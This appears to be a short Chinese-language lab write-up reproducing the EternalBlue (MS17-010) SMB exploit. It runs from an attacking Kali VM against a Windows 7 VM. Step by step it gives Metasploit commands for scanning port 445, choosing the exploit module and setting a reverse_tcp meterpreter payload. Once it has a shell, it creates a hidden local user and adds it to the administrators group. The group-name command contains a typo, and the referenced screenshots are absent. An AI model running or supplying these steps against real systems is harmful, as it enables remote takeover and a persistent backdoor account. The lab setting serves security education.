一.永恒之蓝(Eternal Blue)
永恒之蓝是在Windows的SMB服务处理v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
二.复现环境
攻击机:Kali 192.168.158.128
靶机:Windows 7 192.168.158.129
实验条件:1.两台机子可以ping通 (如果ping不通检查虚拟机中设置-网络)
3.防火墙(Windows 7虚拟机)是关闭的
4.在同一局域网
三.复现过程
1.nmap进行端口扫描,看445端口是否开启,如下图扫描到了445端口是开放的,而永恒之蓝就是利用445端口的smb服务,操作系统溢出漏洞。
2.进入MSF框架: msfconsole
3.使用ms17_010代码: search ms17_010
4.这里会得到一些模块,我们用到的有
扫描模块:auxiliary/scanner/smb/smb_ms17_010
攻击模块:exploit/windows/smb/ms17_010_eternalblue
使用扫描模块:use 3
设置目标IP:set rhosts 192.168.158.129
执行扫描:run
出现这条语句说明有漏洞
接下来执行攻击模块 :use 0
如果出现这条语句:
则需要输入: set payload windows/x64/meterpreter/reverse_tcp
就可以继续执行攻击指令
设置攻击目标IP:set rhosts 192.168.158.129
执行攻击:run
5.这条指令说明攻击成功: meterpreter
6.得到靶机控制台:shell
有乱码,输入chcp 65001 解决乱码问题
现在就可以执行想要操作的指令了:
例如:创建一个用户:net user asdf 123456/add
将创建的用户asdf设为管理员: net localgroup administrator asdf /add
OK结束啦~谢谢观看